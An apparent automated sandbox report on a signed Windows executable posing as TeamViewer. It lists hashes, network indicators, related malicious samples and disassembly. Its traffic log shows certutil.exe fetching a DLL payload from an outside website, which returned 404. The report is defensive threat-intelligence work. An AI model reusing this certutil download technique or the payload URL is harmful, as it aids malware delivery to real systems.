URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | cBQPecnQRp.exe | false | URL Reputation: safe | unknown
https://sectigo.com/CPS0 | cBQPecnQRp.exe | false | URL Reputation: safe | unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | cBQPecnQRp.exe | false | URL Reputation: safe | unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | cBQPecnQRp.exe | false | URL Reputation: safe | unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | cBQPecnQRp.exe | false | URL Reputation: safe | unknown
http://ocsp.sectigo.com0 | cBQPecnQRp.exe | false | URL Reputation: safe | unknown
https://www.christchurchmvl.org/volunteer/actXApiLib.dllC: | certutil.exe, 0000000A.00000002.777469638.0000000000930000.00000004.00000040.sdmp | true | Avira URL Cloud: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
100.26.95.170 | christchurchmvl.org | United States | 14618 | AMAZON-AESUS | true

General Information

Joe Sandbox Version:33.0.0 White Diamond
Analysis ID:483791
Start date:15.09.2021
Start time:13:45:42
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 38s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:cBQPecnQRp (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:20
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal72.evad.winEXE@8/1@2/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 99%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
  • Excluded IPs from analysis (whitelisted): 20.49.157.6, 92.122.145.220, 20.82.210.154, 23.55.161.168, 23.55.161.155, 23.55.161.144, 23.55.161.165, 23.55.161.159, 23.55.161.148, 23.55.161.164, 23.55.161.163, 23.55.161.162, 20.54.110.249, 40.112.88.60, 23.216.77.208, 23.216.77.209
  • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
  • Not all processes were analyzed; the report is missing behavior information
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
13:47:28 | API Interceptor | 1x Sleep call for process: certutil.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
100.26.95.170 | http://ashevilleurological.com/library/photos/medium/index.html | malicious | ashevilleurological.com/library/photos/medium/favicon.ico

Domains

Match | Associated Sample Name / URL | Detection | Context

ASN

Match | Associated Sample Name / URL | Detection | Context
AMAZON-AESUS | 1If1ISJz9D.exe | malicious | 100.26.95.170
 | Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | malicious | 52.71.133.130
 | PO7420.exe | malicious | 52.4.209.250
 | DLH1TwLBhW.exe | malicious | 50.16.244.183
 | avxeC9Wssi | malicious | 54.57.110.152
 | Quotation urgent.exe | malicious | 52.201.24.227
 | KOC RFQ.doc | malicious | 52.204.77.43
 | PO. 2100002_pdf____________________________________.exe | malicious | 3.223.115.185
 | hhh.mp3.dll | malicious | 54.243.45.255
 | xrm4z50ja9.exe | malicious | 54.83.52.76
 | Swift Trf.exe | malicious | 52.201.24.227
 | HjIXsbs4Jg | malicious | 54.142.124.216
 | 7b388AC1Fw | malicious | 44.194.145.151
 | DPD.apk | malicious | 50.16.244.183
 | Po2142021.xlsx | malicious | 18.213.250.117
 | FlashPlayerUpdate.apk | malicious | 23.21.76.7
 | QcXQmNSaSp | malicious | 18.207.108.88
 | i586 | malicious | 34.231.175.5
 | arm | malicious | 54.133.131.54
 | zoD4YzpMMG | malicious | 54.80.227.212

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
ce5f3254611a8c095a3d821d44539877 | 1If1ISJz9D.exe | malicious | 100.26.95.170
 | FjtSz0VShQ.exe | malicious | 100.26.95.170
 | DlZa7n6PjI.exe | malicious | 100.26.95.170
 | L5q2UZAWzY.exe | malicious | 100.26.95.170
 | SecuriteInfo.com.Trojan.DownLoader43.21162.28718.exe | malicious | 100.26.95.170
 | N3sJiiIQAP.exe | malicious | 100.26.95.170
 | hu5De62I6f.exe | malicious | 100.26.95.170
 | cwCpwXnpg4.exe | malicious | 100.26.95.170
 | SacEedFBvw.exe | malicious | 100.26.95.170
 | z5k6kTAFkF.exe | malicious | 100.26.95.170
 | cGJCfDNHnZ.exe | malicious | 100.26.95.170
 | GCw589FSm7.exe | malicious | 100.26.95.170
 | 67d16a17f27f15cf21671ccb406e1e8b647aaf90c72c9.exe | malicious | 100.26.95.170
 | vPzJQvH6Pg.exe | malicious | 100.26.95.170
 | 9f60a157b1a91cc18125825a286baaf011e65b0808be4.exe | malicious | 100.26.95.170
 | P8zmYu7q7j.exe | malicious | 100.26.95.170
 | P8zmYu7q7j.exe | malicious | 100.26.95.170
 | Wyb6Tqwcqx.exe | malicious | 100.26.95.170
 | 8mFCVBuwst.exe | malicious | 100.26.95.170
 | 75114eeae6429f297193678413f5523eea5e25474745d.exe | malicious | 100.26.95.170
37f463bf4616ecd445d4a1937da06e19 | 1If1ISJz9D.exe | malicious | 100.26.95.170
 | 26pBOwgewg.exe | malicious | 100.26.95.170
 | lMESQl89na.exe | malicious | 100.26.95.170
 | JHHPuXppBJ.exe | malicious | 100.26.95.170
 | kpbNbKpJfr.dll | malicious | 100.26.95.170
 | mfQoul1M1Q.exe | malicious | 100.26.95.170
 | k4fNN2WDpY.dll | malicious | 100.26.95.170
 | SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | malicious | 100.26.95.170
 | w9CH3AAVOp.exe | malicious | 100.26.95.170
 | Halkbank02.exe | malicious | 100.26.95.170
 | DlZa7n6PjI.exe | malicious | 100.26.95.170
 | 7Tat85Af0C.exe | malicious | 100.26.95.170
 | 86jLEXtwqR.exe | malicious | 100.26.95.170
 | 6WtKevhqlg.exe | malicious | 100.26.95.170
 | oLn3NAKPzu.exe | malicious | 100.26.95.170
 | hd9uHo4dot.exe | malicious | 100.26.95.170
 | 47U9eIz5bG.exe | malicious | 100.26.95.170
 | FaxGUO65DE.391343-Faa.html | malicious | 100.26.95.170
 | FaxGUO65DE.391343-Faa.html | malicious | 100.26.95.170
 | x13NYP60fd.exe | malicious | 100.26.95.170

Dropped Files

No context

Created / dropped Files

C:\ProgramData\actXApiLib.dll
Process:C:\Windows\SysWOW64\certutil.exe
File Type:HTML document, ASCII text
Category:dropped
Size (bytes):196
Entropy (8bit):5.098952451791238
Encrypted:false
SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezocKqD:J0+oxBeRmR9etdzRxGez1T
MD5:62962DAA1B19BBCC2DB10B7BFD531EA6
SHA1:D64BAE91091EDA6A7532EBEC06AA70893B79E1F8
SHA-256:80C3FE2AE1062ABF56456F52518BD670F9EC3917B7F85E152B347AC6B6FAF880
SHA-512:9002A0475FDB38541E78048709006926655C726E93E823B84E2DBF5B53FD539A5342E7266447D23DB0E5528E27A19961B115B180C94F2272FF124C7E5C8304E7
Malicious:true
Reputation:low
Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.</body></html>.

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.445333009028377
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:cBQPecnQRp.exe
File size:1363448
MD5:53817315b195e328ccc0f56b15b247c7
SHA1:7bedab96b89d000288b573de0b5693cf49dae47f
SHA256:ea2decec34ae3129d5da1f2035b34cff3c9f656bb4423904ef6b0a3ca5f47d5e
SHA512:2ca834743045f742bc65da90f1b0868af54f7d703c0ef11b6deac4080bb7260ad2f9d5d0bb7b5e2a2eca5ef837c6ad976234594e931c6fbfce06c8e1d4cb1512
SSDEEP:24576:NVPOpKJdaWTVE6LwF5oSZc1HHZZZ6OEtdU:mId1+6cjoSMHHZZZ6OEtd
File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......s..r7..!7..!7..!l.. !..!l.. ...!... &..!... /..!... 1..!... ...!l.. ...!l.. 4..!... ...!7..!`..!mK1!?..!7..!...!... a..!...!6..

File Icon

Icon Hash:78706a6ab8a180c0

Static PE Info

General

Entrypoint:0x44f6f0
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:GUARD_CF, TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:0x5FD76A63 [Mon Dec 14 13:36:35 2020 UTC]
TLS Callbacks:0x494680, 0x494e50, 0x494eb0
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:b5f0210fb8fa3412ad980dc8b3f3cd95

Authenticode Signature

Signature Valid:true
Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
Signature Validation Error:The operation completed successfully
Error Number:0
Not Before, Not After
  • 6/4/2021 2:00:00 AM 6/5/2022 1:59:59 AM
Subject Chain
  • CN=Hartex LLC, O=Hartex LLC, L=Moscow, C=RU
Version:3
Thumbprint MD5:5D5CA7E8D78224799E8AA101FF486137
Thumbprint SHA-1:319517761E92EC6EEF1966A5994570D46A498093
Thumbprint SHA-256:AC50A5D91A71BA8447EE795FF966E625AEC004E49EB24ADAA366B988686B65A5
Serial:009B576882CCDB891FD6E4A66671F3AC71

Entrypoint Preview

Instruction
call 00007FA0C4A06EA8h
jmp 00007FA0C4A064BDh
push ebp
mov ebp, esp
pop ebp
jmp 00007FA0C4A05F16h
jmp 00007FA0C4A05EEDh
int3
int3
int3
int3
int3
int3
int3
int3
push ecx
lea ecx, dword ptr [esp+08h]
sub ecx, eax
and ecx, 0Fh
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp 00007FA0C4A06F8Fh
push ecx
lea ecx, dword ptr [esp+08h]
sub ecx, eax
and ecx, 07h
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp 00007FA0C4A06F79h
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007FA0C4A05E9Fh
jmp 00007FA0C4A06620h
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [004F4024h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [004F4024h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf2f44 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xfe000 | 0x47b40 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x14a800 | 0x25f8 | .reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x146000 | 0xa23c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xe2c10 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xe2c64 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xbe8d8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb9000 | 0x24c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xf2598 | 0x160 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xb718a | 0xb7200 | False | 0.495668462031 | data | 6.785949083 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0xb9000 | 0x3acc0 | 0x3ae00 | False | 0.322618099788 | COM executable for DOS | 6.31638797155 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xf4000 | 0x8ac8 | 0x6200 | False | 0.153698979592 | data | 4.61512382052 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.didat | 0xfd000 | 0x164 | 0x200 | False | 0.41015625 | data | 3.13519516789 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0xfe000 | 0x47b40 | 0x47c00 | False | 0.076784353223 | data | 3.18159027325 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x146000 | 0xa23c | 0xa400 | False | 0.605182926829 | data | 6.59143707944 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_BITMAP | 0xfe3b8 | 0x1568 | data | German | Germany
RT_BITMAP | 0xff920 | 0x1d8 | data | German | Germany
RT_ICON | 0xffe28 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x100290 | 0x10a8 | data | English | United States
RT_ICON | 0x101338 | 0x25a8 | data | English | United States
RT_ICON | 0x1038e0 | 0x42028 | data | English | United States
RT_DIALOG | 0xfe310 | 0xa4 | data | German | Germany
RT_STRING | 0x145958 | 0x62 | data | English | United States
RT_ACCELERATOR | 0x145948 | 0x10 | data | English | United States
RT_GROUP_ICON | 0x145908 | 0x3e | data | English | United States
RT_VERSION | 0xffaf8 | 0x32c | data | German | Germany
RT_MANIFEST | 0x1459c0 | 0x17d | XML 1.0 document text | English | United States

Imports

DLL | Import
KERNEL32.dll | LoadLibraryExA, GetModuleHandleA, GetModuleFileNameA, GetSystemDirectoryA, GetModuleFileNameW, SetLastError, EnterCriticalSection, LeaveCriticalSection, GetCurrentThreadId, RaiseException, DeleteCriticalSection, GetLastError, InitializeCriticalSectionEx, HeapDestroy, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetProcessHeap, SizeofResource, LockResource, LoadResource, FindResourceW, FindResourceExW, DecodePointer, GetProcAddress, FreeLibrary, VerSetConditionMask, VerifyVersionInfoW, IsWow64Process, GetCurrentProcess, SetSearchPathMode, SetDllDirectoryW, HeapSetInformation, SetProcessDEPPolicy, GetSystemDirectoryW, LoadLibraryExW, LoadLibraryW, GetFileAttributesW, CreateFileW, CloseHandle, WideCharToMultiByte, LocalFree, FormatMessageW, FormatMessageA, CreateTimerQueue, GetSystemInfo, VirtualProtect, VirtualQuery, GetModuleHandleW, MultiByteToWideChar, GetStringTypeW, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, EncodePointer, LCMapStringW, GetLocaleInfoW, GetCPInfo, InitializeSListHead, InterlockedPopEntrySList, InterlockedPushEntrySList, FlushInstructionCache, IsProcessorFeaturePresent, VirtualAlloc, VirtualFree, IsDebuggerPresent, OutputDebugStringW, SetEvent, ResetEvent, WaitForSingleObjectEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, RtlUnwind, InterlockedFlushSList, ExitProcess, GetModuleHandleExW, GetStdHandle, WriteFile, GetCurrentThread, GetFileType, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, TerminateThread, QueueUserAPC, CreateEventA, CreateDirectoryW, InitializeCriticalSection, ReleaseMutex, CreateMutexW, OpenMutexW, GetFileSize, OpenEventA, UnregisterWaitEx, Sleep, RegisterWaitForSingleObject, GetLocalTime, DuplicateHandle, ReleaseSemaphore, SetThreadPriority, QueryPerformanceFrequency, GetThreadTimes, TryEnterCriticalSection, GetLogicalProcessorInformation, CreateThread, FreeLibraryAndExitThread, SignalObjectAndWait, GetThreadPriority, CreateTimerQueueTimer, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, UnregisterWait, GetVersionExW, QueryDepthSList

Version Infos

Description | Data
LegalCopyright | TeamViewer Germany GmbH
InternalName | TeamViewer
FileVersion | 15.13.6.0
CompanyName | TeamViewer Germany GmbH
LegalTrademarks | TeamViewer
ProductName | TeamViewer
ProductVersion | 15.13.6.0
FileDescription | TeamViewer
OriginalFilename | TeamViewer_Note.exe
Translation | 0x0409 0x04b0

Possible Origin

Language of compilation system | Country where language is spoken
German | Germany
English | United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 15, 2021 13:47:27.926995993 CEST | 49772 | 443 | 192.168.2.4 | 100.26.95.170
Sep 15, 2021 13:47:27.927061081 CEST | 443 | 49772 | 100.26.95.170 | 192.168.2.4
Sep 15, 2021 13:47:27.927170992 CEST | 49772 | 443 | 192.168.2.4 | 100.26.95.170
Sep 15, 2021 13:47:27.931725025 CEST | 49772 | 443 | 192.168.2.4 | 100.26.95.170
Sep 15, 2021 13:47:27.931766033 CEST | 443 | 49772 | 100.26.95.170 | 192.168.2.4
Sep 15, 2021 13:47:28.359617949 CEST | 443 | 49772 | 100.26.95.170 | 192.168.2.4
Sep 15, 2021 13:47:28.359714031 CEST | 49772 | 443 | 192.168.2.4 | 100.26.95.170
Sep 15, 2021 13:47:28.408446074 CEST | 49772 | 443 | 192.168.2.4 | 100.26.95.170
Sep 15, 2021 13:47:28.408477068 CEST | 443 | 49772 | 100.26.95.170 | 192.168.2.4
Sep 15, 2021 13:47:28.408838034 CEST | 443 | 49772 | 100.26.95.170 | 192.168.2.4
Sep 15, 2021 13:47:28.473718882 CEST | 49772 | 443 | 192.168.2.4 | 100.26.95.170
Sep 15, 2021 13:47:29.485140085 CEST | 49772 | 443 | 192.168.2.4 | 100.26.95.170
Sep 15, 2021 13:47:29.527137995 CEST | 443 | 49772 | 100.26.95.170 | 192.168.2.4
Sep 15, 2021 13:47:29.625088930 CEST | 443 | 49772 | 100.26.95.170 | 192.168.2.4
Sep 15, 2021 13:47:29.641112089 CEST | 49772 | 443 | 192.168.2.4 | 100.26.95.170
Sep 15, 2021 13:47:30.275280952 CEST | 49773 | 443 | 192.168.2.4 | 100.26.95.170
Sep 15, 2021 13:47:30.275331020 CEST | 443 | 49773 | 100.26.95.170 | 192.168.2.4
Sep 15, 2021 13:47:30.275847912 CEST | 49773 | 443 | 192.168.2.4 | 100.26.95.170
Sep 15, 2021 13:47:30.276878119 CEST | 49773 | 443 | 192.168.2.4 | 100.26.95.170
Sep 15, 2021 13:47:30.276904106 CEST | 443 | 49773 | 100.26.95.170 | 192.168.2.4
Sep 15, 2021 13:47:30.557873964 CEST | 443 | 49773 | 100.26.95.170 | 192.168.2.4
Sep 15, 2021 13:47:30.558068991 CEST | 49773 | 443 | 192.168.2.4 | 100.26.95.170
Sep 15, 2021 13:47:31.136315107 CEST | 49773 | 443 | 192.168.2.4 | 100.26.95.170
Sep 15, 2021 13:47:31.136341095 CEST | 443 | 49773 | 100.26.95.170 | 192.168.2.4
Sep 15, 2021 13:47:31.136692047 CEST | 443 | 49773 | 100.26.95.170 | 192.168.2.4
Sep 15, 2021 13:47:31.136763096 CEST | 49773 | 443 | 192.168.2.4 | 100.26.95.170
Sep 15, 2021 13:47:31.137299061 CEST | 49773 | 443 | 192.168.2.4 | 100.26.95.170
Sep 15, 2021 13:47:31.179140091 CEST | 443 | 49773 | 100.26.95.170 | 192.168.2.4
Sep 15, 2021 13:47:31.276369095 CEST | 443 | 49773 | 100.26.95.170 | 192.168.2.4
Sep 15, 2021 13:47:31.276463985 CEST | 49773 | 443 | 192.168.2.4 | 100.26.95.170
Sep 15, 2021 13:47:31.276484013 CEST | 443 | 49773 | 100.26.95.170 | 192.168.2.4
Sep 15, 2021 13:47:31.276531935 CEST | 49773 | 443 | 192.168.2.4 | 100.26.95.170
Sep 15, 2021 13:47:31.291244984 CEST | 49773 | 443 | 192.168.2.4 | 100.26.95.170
Sep 15, 2021 13:47:31.291408062 CEST | 443 | 49773 | 100.26.95.170 | 192.168.2.4
Sep 15, 2021 13:47:31.291496038 CEST | 49773 | 443 | 192.168.2.4 | 100.26.95.170

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 15, 2021 13:46:34.089144945 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
Sep 15, 2021 13:46:34.133929968 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
Sep 15, 2021 13:46:36.824444056 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
Sep 15, 2021 13:46:36.863562107 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
Sep 15, 2021 13:47:10.051311970 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
Sep 15, 2021 13:47:10.079045057 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
Sep 15, 2021 13:47:25.735857010 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
Sep 15, 2021 13:47:25.764188051 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
Sep 15, 2021 13:47:27.737127066 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Sep 15, 2021 13:47:27.914834023 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Sep 15, 2021 13:47:30.207760096 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
Sep 15, 2021 13:47:30.271061897 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
Sep 15, 2021 13:47:31.987982035 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
Sep 15, 2021 13:47:32.026420116 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
Sep 15, 2021 13:47:32.757365942 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
Sep 15, 2021 13:47:32.811314106 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
Sep 15, 2021 13:47:33.307559967 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
Sep 15, 2021 13:47:33.334069014 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
Sep 15, 2021 13:47:33.695559978 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
Sep 15, 2021 13:47:33.698770046 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
Sep 15, 2021 13:47:33.735899925 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
Sep 15, 2021 13:47:33.754201889 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
Sep 15, 2021 13:47:34.294879913 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
Sep 15, 2021 13:47:34.367065907 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
Sep 15, 2021 13:47:35.136635065 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
Sep 15, 2021 13:47:35.165318966 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
Sep 15, 2021 13:47:35.826641083 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
Sep 15, 2021 13:47:35.885911942 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
Sep 15, 2021 13:47:36.763900995 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
Sep 15, 2021 13:47:36.793672085 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4
Sep 15, 2021 13:47:37.570334911 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
Sep 15, 2021 13:47:37.610944033 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
Sep 15, 2021 13:47:38.181309938 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
Sep 15, 2021 13:47:38.214015007 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
Sep 15, 2021 13:47:49.626492977 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
Sep 15, 2021 13:47:49.663325071 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4
Sep 15, 2021 13:48:23.738024950 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8
Sep 15, 2021 13:48:23.775444031 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4
Sep 15, 2021 13:48:25.384879112 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8
Sep 15, 2021 13:48:25.411534071 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 15, 2021 13:47:27.737127066 CEST | 192.168.2.4 | 8.8.8.8 | 0xbe2e | Standard query (0) | www.christchurchmvl.org | A (IP address) | IN (0x0001)
Sep 15, 2021 13:47:30.207760096 CEST | 192.168.2.4 | 8.8.8.8 | 0xefdf | Standard query (0) | www.christchurchmvl.org | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 15, 2021 13:47:27.914834023 CEST | 8.8.8.8 | 192.168.2.4 | 0xbe2e | No error (0) | www.christchurchmvl.org | christchurchmvl.org | | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 13:47:27.914834023 CEST | 8.8.8.8 | 192.168.2.4 | 0xbe2e | No error (0) | christchurchmvl.org | | 100.26.95.170 | A (IP address) | IN (0x0001)
Sep 15, 2021 13:47:30.271061897 CEST | 8.8.8.8 | 192.168.2.4 | 0xefdf | No error (0) | www.christchurchmvl.org | christchurchmvl.org | | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 13:47:30.271061897 CEST | 8.8.8.8 | 192.168.2.4 | 0xefdf | No error (0) | christchurchmvl.org | | 100.26.95.170 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

  • www.christchurchmvl.org

HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49772 | 100.26.95.170 | 443 | C:\Windows\SysWOW64\certutil.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:47:29 UTC | 0 | OUT | GET /volunteer/actXApiLib.dll HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: www.christchurchmvl.org
2021-09-15 11:47:29 UTC | 0 | IN | HTTP/1.1 404 Not Found
Date: Wed, 15 Sep 2021 11:47:29 GMT
Server: Apache
Content-Length: 196
Connection: close
